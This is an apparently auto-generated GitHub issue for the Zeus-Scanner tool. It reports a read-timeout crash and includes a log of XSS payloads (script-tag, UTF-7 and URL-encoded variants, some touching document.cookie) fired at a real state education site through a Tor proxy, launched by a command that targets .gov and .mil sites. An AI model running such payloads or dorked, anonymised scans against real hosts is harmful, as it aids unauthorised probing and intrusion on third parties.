### ISSUE TITLE
Unhandled exception (OWOvrpJ)

### ISSUE THREAD

**Issue by ZeusIssueReporter** [Ekultek/Zeus-Scanner#216]
Zeus version:
`1.3.13.54dd5d`

Firefox version:
`(57, 0)`

Geckodriver version:
`geckodriver-v0.19.0-linux64.tar.gz`

Error info:
```Traceback (most recent call last):
  File "zeus.py", line 408, in <module>
    __run_attacks_main()
  File "zeus.py", line 305, in __run_attacks_main
    threads=opt.amountOfThreads
  File "/home/baal/bin/python/zeus-scanner/lib/core/settings.py", line 1008, in run_attacks
    agent=agent, tamper=tamper_script, batch=batch,
  File "/home/baal/bin/python/zeus-scanner/lib/attacks/xss_scan/__init__.py", line 198, in main_xss
    result = scan_xss(url, proxy=proxy, agent=agent)
  File "/home/baal/bin/python/zeus-scanner/lib/attacks/xss_scan/__init__.py", line 119, in scan_xss
    xss_request = requests.get(url, proxies=config_proxy, headers=config_headers)
  File "/home/baal/.local/lib/python2.7/site-packages/requests/api.py", line 72, in get
    return request('get', url, params=params, **kwargs)
  File "/home/baal/.local/lib/python2.7/site-packages/requests/api.py", line 58, in request
    return session.request(method=method, url=url, **kwargs)
  File "/home/baal/.local/lib/python2.7/site-packages/requests/sessions.py", line 508, in request
    resp = self.send(prep, **send_kwargs)
  File "/home/baal/.local/lib/python2.7/site-packages/requests/sessions.py", line 618, in send
    r = adapter.send(request, **kwargs)
  File "/home/baal/.local/lib/python2.7/site-packages/requests/adapters.py", line 521, in send
    raise ReadTimeout(e, request=request)
ReadTimeout: HTTPConnectionPool(host='apps.gadoe.org', port=80): Read timed out. (read timeout=None)
````

Running details:
`Linux-4.10.0-40-generic-x86_64-with-Ubuntu-17.04-zesty`

Commands used:
`zeus.py -d ext:nsf nsf -gov -mil --verbose --batch -x --x-forward --random-agent --proxy socks5://127.0.0.1:9050 --tamper=enclosebrackets -M -L 10`

Log file info:
```2017-12-02 09:37:44,314;zeus-log;INFO;trying payload '">{alert(['1'])}</script>;['1']'...
2017-12-02 09:37:44,314;zeus-log;DEBUG;host 'http://apps.gadoe.org/schoolclimate/participation.nsf' does not appear to be vulnerable to XSS attacks with payload '">{alert(['1'])}</script>;['1']'...
2017-12-02 09:37:44,418;zeus-log;INFO;trying payload '/schoolclimate/participation.nsf<script>crypto.generateCRMFRequest('CN=['0']',['0'],['0'],null,'alert(['1'])',['3']['8']['4'],null,'rsa-dual-use')</script>'...
2017-12-02 09:37:44,418;zeus-log;DEBUG;host 'http://apps.gadoe.org/schoolclimate/participation.nsf' does not appear to be vulnerable to XSS attacks with payload '/schoolclimate/participation.nsf<script>crypto.generateCRMFRequest('CN=['0']',['0'],['0'],null,'alert(['1'])',['3']['8']['4'],null,'rsa-dual-use')</script>'...
2017-12-02 09:37:44,512;zeus-log;INFO;trying payload '"><script>alert(['1'])</script></svg>'...
2017-12-02 09:37:44,513;zeus-log;DEBUG;host 'http://apps.gadoe.org/schoolclimate/participation.nsf' does not appear to be vulnerable to XSS attacks with payload '"><script>alert(['1'])</script></svg>'...
2017-12-02 09:37:44,611;zeus-log;INFO;trying payload '"></svg>'...
2017-12-02 09:37:44,612;zeus-log;DEBUG;host 'http://apps.gadoe.org/schoolclimate/participation.nsf' does not appear to be vulnerable to XSS attacks with payload '"></svg>'...
2017-12-02 09:37:44,710;zeus-log;INFO;trying payload '" src="javascript:alert(['1'])"></iframe>'...
2017-12-02 09:37:44,711;zeus-log;DEBUG;host 'http://apps.gadoe.org/schoolclimate/participation.nsf' does not appear to be vulnerable to XSS attacks with payload '" src="javascript:alert(['1'])"></iframe>'...
2017-12-02 09:37:44,813;zeus-log;INFO;trying payload '/schoolclimate/participation.nsf+ADw-script+AD['4']-alert(document.location)+ADw-/script+AD['4']-'...
2017-12-02 09:37:44,814;zeus-log;DEBUG;host 'http://apps.gadoe.org/schoolclimate/participation.nsf' does not appear to be vulnerable to XSS attacks with payload '/schoolclimate/participation.nsf+ADw-script+AD['4']-alert(document.location)+ADw-/script+AD['4']-'...
2017-12-02 09:37:44,917;zeus-log;INFO;trying payload '/schoolclimate/participation.nsf%['2']BADw-script+AD['4']-alert(document.location)%['2']BADw-/script%['2']BAD['4']-'...
2017-12-02 09:37:44,917;zeus-log;DEBUG;host 'http://apps.gadoe.org/schoolclimate/participation.nsf' does not appear to be vulnerable to XSS attacks with payload '/schoolclimate/participation.nsf%['2']BADw-script+AD['4']-alert(document.location)%['2']BADw-/script%['2']BAD['4']-'...
2017-12-02 09:37:45,012;zeus-log;INFO;trying payload '/schoolclimate/participation.nsf+ACIAPgA['8']-script+AD['4']-alert(document.location)+ADw-/script+AD['4']APAAi-'...
2017-12-02 09:37:45,012;zeus-log;DEBUG;host 'http://apps.gadoe.org/schoolclimate/participation.nsf' does not appear to be vulnerable to XSS attacks with payload '/schoolclimate/participation.nsf+ACIAPgA['8']-script+AD['4']-alert(document.location)+ADw-/script+AD['4']APAAi-'...
2017-12-02 09:37:45,104;zeus-log;INFO;trying payload '/schoolclimate/participation.nsf%['2']BACIAPgA['8']-script%['2']BAD['4']-alert%['2']['8']document.location%['2']['9']%['2']BADw-%['2']Fscript%['2']BAD['4']APAAi-'...
2017-12-02 09:37:45,105;zeus-log;DEBUG;host 'http://apps.gadoe.org/schoolclimate/participation.nsf' does not appear to be vulnerable to XSS attacks with payload '/schoolclimate/participation.nsf%['2']BACIAPgA['8']-script%['2']BAD['4']-alert%['2']['8']document.location%['2']['9']%['2']BADw-%['2']Fscript%['2']BAD['4']APAAi-'...
2017-12-02 09:37:45,241;zeus-log;INFO;trying payload '/schoolclimate/participation.nsf%['2']['5']['3']cscript%['2']['5']['3']ealert(document.cookie)%['2']['5']['3']c/script%['2']['5']['3']e'...
2017-12-02 09:37:45,241;zeus-log;DEBUG;host 'http://apps.gadoe.org/schoolclimate/participation.nsf' does not appear to be vulnerable to XSS attacks with payload '/schoolclimate/participation.nsf%['2']['5']['3']cscript%['2']['5']['3']ealert(document.cookie)%['2']['5']['3']c/script%['2']['5']['3']e'...
2017-12-02 09:37:45,344;zeus-log;INFO;trying payload '/schoolclimate/participation.nsf"><s"%['2']b"cript>alert(document.cookie)</script>'...
2017-12-02 09:37:45,344;zeus-log;DEBUG;host 'http://apps.gadoe.org/schoolclimate/participation.nsf' does not appear to be vulnerable to XSS attacks with payload '/schoolclimate/participation.nsf"><s"%['2']b"cript>alert(document.cookie)</script>'...
2017-12-02 09:54:10,856;zeus-log;ERROR;[7;31;31mZeus has hit an unexpected error and cannot continue, error code 'HTTPConnectionPool(host='apps.gadoe.org', port=80): Read timed out. (read timeout=None)'...
Traceback (most recent call last):
  File "zeus.py", line 408, in <module>
    __run_attacks_main()
  File "zeus.py", line 305, in __run_attacks_main
    threads=opt.amountOfThreads
  File "/home/baal/bin/python/zeus-scanner/lib/core/settings.py", line 1008, in run_attacks
    agent=agent, tamper=tamper_script, batch=batch,
  File "/home/baal/bin/python/zeus-scanner/lib/attacks/xss_scan/__init__.py", line 198, in main_xss
    result = scan_xss(url, proxy=proxy, agent=agent)
  File "/home/baal/bin/python/zeus-scanner/lib/attacks/xss_scan/__init__.py", line 119, in scan_xss
    xss_request = requests.get(url, proxies=config_proxy, headers=config_headers)
  File "/home/baal/.local/lib/python2.7/site-packages/requests/api.py", line 72, in get
    return request('get', url, params=params, **kwargs)
  File "/home/baal/.local/lib/python2.7/site-packages/requests/api.py", line 58, in request
    return session.request(method=method, url=url, **kwargs)
  File "/home/baal/.local/lib/python2.7/site-packages/requests/sessions.py", line 508, in request
    resp = self.send(prep, **send_kwargs)
  File "/home/baal/.local/lib/python2.7/site-packages/requests/sessions.py", line 618, in send
    r = adapter.send(request, **kwargs)
  File "/home/baal/.local/lib/python2.7/site-packages/requests/adapters.py", line 521, in send
    raise ReadTimeout(e, request=request)
ReadTimeout: HTTPConnectionPool(host='apps.gadoe.org', port=80): Read timed out. (read timeout=None)

2017-12-02 09:54:11,323;zeus-log;INFO;[32mZeus got an unexpected error and will automatically create an issue for this error, please wait...[0m
2017-12-02 09:54:11,323;zeus-log;INFO;[32mgetting authorization...[0m
2017-12-02 09:54:11,345;zeus-log;INFO;[32mextracting traceback from log file...[0m
2017-12-02 09:54:11,346;zeus-log;INFO;[32mattempting to get firefox browser version...[0m
```

**Comment by Ekultek** [comment]
patched via https://github.com/Ekultek/Zeus-Scanner/commit/54dd5d47f5309b5a2019b82ef947ab10ecd7628e
